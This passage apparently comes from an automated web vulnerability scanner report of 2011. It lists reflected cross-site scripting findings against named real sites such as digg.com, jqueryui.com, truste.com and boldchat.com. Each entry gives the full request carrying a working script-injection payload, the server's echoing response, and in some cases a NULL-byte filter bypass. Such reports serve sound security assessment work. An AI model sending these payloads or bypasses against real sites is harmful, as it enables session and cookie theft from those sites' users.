Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/releases/-/-/3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccc3d"><script>alert(1)</script>263690e9a78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/releases/-/-/3.html?ccc3d"><script>alert(1)</script>263690e9a78=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:58 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/Hyundai%2BMotor%2BAmerica%2BReports%2BRecord%2BJanuary%2BSales%2B--%2BFOUNTAIN%2BVALLEY%252C%2BCalif.%252C%2BFeb.%2B1%252C%2B2011%2B%252FPRNewswire%252F%2B--.html?ccc3d"><script>alert(1)</script>263690e9a78=1" title="Search discussions for item &quot;Hyundai Motor America Reports Record January Sales -- FOUNTAIN VALLEY, Calif., Feb. 1, 2011 /PRNewswire/ --&quot;">
...[SNIP]...

1.49. http://boardreader.com/pop/sites.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/sites.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c1aa'><script>alert(1)</script>341d035808d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/sites.html?9c1aa'><script>alert(1)</script>341d035808d=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:31:56 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a href='/pop/sites.html?9c1aa'><script>alert(1)</script>341d035808d=1&o=10'>
...[SNIP]...

1.50. http://boardreader.com/pop/videos/-/-/3.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /pop/videos/-/-/3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2008f"><script>alert(1)</script>ade1aee3939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pop/videos/-/-/3.html?2008f"><script>alert(1)</script>ade1aee3939=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 20:32:03 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <link rel="shortcut
...[SNIP]...
<a class="disc" href="/s/Today%2BShow%2BJanuary%2B1994...What%2Bis%2Bthe%2BInternet%253F%253F.html?2008f"><script>alert(1)</script>ade1aee3939=1" title="Search discussions for item &quot;Today Show January 1994...What is the Internet??&quot;">
...[SNIP]...

1.51. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload f1c31<script>alert(1)</script>9c812db7f39 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAADnAS0wE~,ddeyF9dBubzZEABHXI8Tafb593RYf5ad HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=486&height=322&flashID=myExperience700903960001&bgcolor=%23FFFFFF&playerID=64829845001&playerKey=AQ~~%2CAAAADnAS0wE~%2CddeyF9dBubzZEABHXI8Tafb593RYf5ad&isVid=true&dynamicStreaming=true&%40videoPlayer=700903960001&autoStart=
content-type: application/x-amf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 538

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q7a72a24e428a8cdcd38fc9490194c3afa5313cc1
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 19:45:14 GMT
Server:
Content-Length: 4103

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
,.%.....eAQ~~,AAAADnAS0wE~,ddeyF9dBubzZEABHXI8Tafb593RYf5ad.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId    type.mediaDTO
.Bdf$5. ....ivideoPlayerf1c31<script>alert(1)</script>9c812db7f39.........
.SOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...

1.52. http://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [rdid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cbi.boldchat.com
Path:   /aid/3760177095415339810/bc.cbhs

Issue detail

The value of the rdid request parameter is copied into the HTML document as plain text between tags. The payload 91ccd<script>alert(1)</script>82e43485041 was submitted in the rdid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aid/3760177095415339810/bc.cbhs?wdid=798708614246318013&rdid=120108381222096822891ccd<script>alert(1)</script>82e43485041 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cbi.boldchat.com

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Date: Thu, 03 Feb 2011 19:19:51 GMT
Content-Length: 142

/* An error has occured: java.lang.NumberFormatException: For input string: "120108381222096822891ccd<script>alert(1)</script>82e43485041" */

1.53. http://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [wdid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cbi.boldchat.com
Path:   /aid/3760177095415339810/bc.cbhs

Issue detail

The value of the wdid request parameter is copied into the HTML document as plain text between tags. The payload 26709<script>alert(1)</script>40fb537d3b1 was submitted in the wdid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aid/3760177095415339810/bc.cbhs?wdid=79870861424631801326709<script>alert(1)</script>40fb537d3b1&rdid=1201083812220968228 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cbi.boldchat.com

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Date: Thu, 03 Feb 2011 19:19:50 GMT
Content-Length: 141

/* An error has occured: java.lang.NumberFormatException: For input string: "79870861424631801326709<script>alert(1)</script>40fb537d3b1" */

1.54. https://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [rdid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cbi.boldchat.com
Path:   /aid/3760177095415339810/bc.cbhs

Issue detail

The value of the rdid request parameter is copied into the HTML document as plain text between tags. The payload 5634a<script>alert(1)</script>fed7ed4bbdf was submitted in the rdid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aid/3760177095415339810/bc.cbhs?wdid=798708614246318013&rdid=1201083812220968228"%3E%3C/script%3E5634a<script>alert(1)</script>fed7ed4bbdf HTTP/1.1
Host: cbi.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset="UTF-8"
Date: Thu, 03 Feb 2011 19:47:51 GMT
Content-Length: 153

/* An error has occured: java.lang.NumberFormatException: For input string: "1201083812220968228"></script>5634a<script>alert(1)</script>fed7ed4bbdf" */

1.55. https://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [wdid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cbi.boldchat.com
Path:   /aid/3760177095415339810/bc.cbhs

Issue detail

The value of the wdid request parameter is copied into the HTML document as plain text between tags. The payload fe98c<script>alert(1)</script>3b948965da2 was submitted in the wdid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aid/3760177095415339810/bc.cbhs?wdid=798708614246318013fe98c<script>alert(1)</script>3b948965da2&rdid=1201083812220968228"%3E%3C/script%3E HTTP/1.1
Host: cbi.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset="UTF-8"
Date: Thu, 03 Feb 2011 19:47:48 GMT
Content-Length: 141

/* An error has occured: java.lang.NumberFormatException: For input string: "798708614246318013fe98c<script>alert(1)</script>3b948965da2" */

1.56. http://clicktoverify.truste.com/pvr.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the name of an HTML tag attribute. The payload e483d%20style%3dx%3aexpression(alert(1))%207543349c09e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e483d style=x:expression(alert(1)) 7543349c09e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /pvr.php?page=validate&url=www.supermedia.com&sealid=101bb24b%20style%3dx%3aexpression(alert(document.cookie))%2038cf935/e483d%20style%3dx%3aexpression(alert(1))%207543349c09e101b HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: clicktoverify.truste.com
Cookie: __utma=165058976.885858271.1296786644.1296786644.1296786644.1; __utmb=165058976.1.10.1296786644; __utmc=165058976; __utmz=165058976.1296786644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/28

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 17:56:28 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 8431


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certification by TRUSTe</title>
<meta nam
...[SNIP]...
<input
           type='hidden' name='sealid' value=101bb24b style=x:expression(alert(document.cookie)) 38cf935/e483d style=x:expression(alert(1)) 7543349c09e101b>
...[SNIP]...

1.57. http://clicktoverify.truste.com/pvr.php [sealid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The value of the sealid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload bb24b%20style%3dx%3aexpression(alert(1))%2038cf935101b was submitted in the sealid parameter. This input was echoed as bb24b style=x:expression(alert(1)) 38cf935101b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /pvr.php?page=validate&url=www.supermedia.com&sealid=101bb24b%20style%3dx%3aexpression(alert(1))%2038cf935101b HTTP/1.1
Host: clicktoverify.truste.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:18 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8370


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certification by TRUSTe</title>
<meta nam
...[SNIP]...
<input
           type='hidden' name='sealid' value=101bb24b style=x:expression(alert(1)) 38cf935101b>
...[SNIP]...

1.58. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00f1926<a>d08f4d1b1f6 was submitted in the REST URL parameter 1. This input was echoed as f1926<a>d08f4d1b1f6 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00f1926<a>d08f4d1b1f6/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:50:17 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1643
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>d08f4d1b1f6/">weblog%00f1926<a>d08f4d1b1f6</a>
...[SNIP]...

1.59. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c6e63"><script>alert(1)</script>ac88b9e9cb was submitted in the REST URL parameter 1. This input was echoed as c6e63"><script>alert(1)</script>ac88b9e9cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%00c6e63"><script>alert(1)</script>ac88b9e9cb/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:50:16 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1785
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%00c6e63"><script>alert(1)</script>ac88b9e9cb/2006/">
...[SNIP]...

1.60. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 98ff3<a>94fdf96a678 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/03/base98ff3<a>94fdf96a678/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:50:54 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Thu, 03 Feb 2011 19:50:55 GMT
Last-Modified: Thu, 03 Feb 2011 19:50:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1351
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/base98ff3<a>94fdf96a678/</h1>
...[SNIP]...

1.61. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae08"><script>alert(1)</script>c1a45a5709b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fae08\"><script>alert(1)</script>c1a45a5709b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/03/base/?fae08"><script>alert(1)</script>c1a45a5709b=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:49:28 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=66>; rel=shortlink
Expires: Thu, 03 Feb 2011 19:49:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 176151

<!doctype html>
<html>
<head>
<title>Dean Edwards: A Base Class for JavaScript Inheritance</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="styleshe
...[SNIP]...
<form class="contact" action="/weblog/2006/03/base/?fae08\"><script>alert(1)</script>c1a45a5709b=1#preview" method="post">
...[SNIP]...

1.62. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a084d"><script>alert(1)</script>ceea5e5408a was submitted in the REST URL parameter 1. This input was echoed as a084d"><script>alert(1)</script>ceea5e5408a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00a084d"><script>alert(1)</script>ceea5e5408a HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:35:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Fri, 04-Feb-2011 19:35:53 GMT; path=/; domain=digg.com
Set-Cookie: d=f2535ea97972169fa95cf5518bcd78dcc3e70bcad57c10fe678aafc2267b22c0; expires=Wed, 03-Feb-2021 05:43:33 GMT; path=/; domain=.digg.com
X-Digg-Time: D=323639 10.2.128.32
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15618

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00a084d"><script>alert(1)</script>ceea5e5408a.rss">
...[SNIP]...

1.63. http://ds.addthis.com/red/psi/sites/www.ip-adress.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.ip-adress.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 373f2<script>alert(1)</script>e896c8e12b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.ip-adress.com/p.json?callback=_ate.ad.hpr373f2<script>alert(1)</script>e896c8e12b&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ip-adress.com%2Fwhois%2Fsmartdevil.com44a08'%253b28a34fbd60c%2Fx22&ref=http%3A%2F%2Fburp%2Fshow%2F36&1l3wvz8 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296751058.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 326
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 04 Feb 2011 17:55:25 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 06 Mar 2011 17:55:25 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296842125.60|1296659685.66; Domain=.addthis.com; Expires=Sun, 03-Feb-2013 13:54:01 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 04 Feb 2011 17:55:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 04 Feb 2011 17:55:25 GMT
Connection: close

_ate.ad.hpr373f2<script>alert(1)</script>e896c8e12b({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.ip-adress.com%2fwhois%2fsmartdevil.com44a08%27%253b28a34fbd60c%2fx22
...[SNIP]...

1.64. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ad9c"><script>alert(1)</script>ce5a88a8f06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?2ad9c"><script>alert(1)</script>ce5a88a8f06=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 22:06:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&2ad9c"><script>alert(1)</script>ce5a88a8f06=1" type="text/css" media="all" />
...[SNIP]...

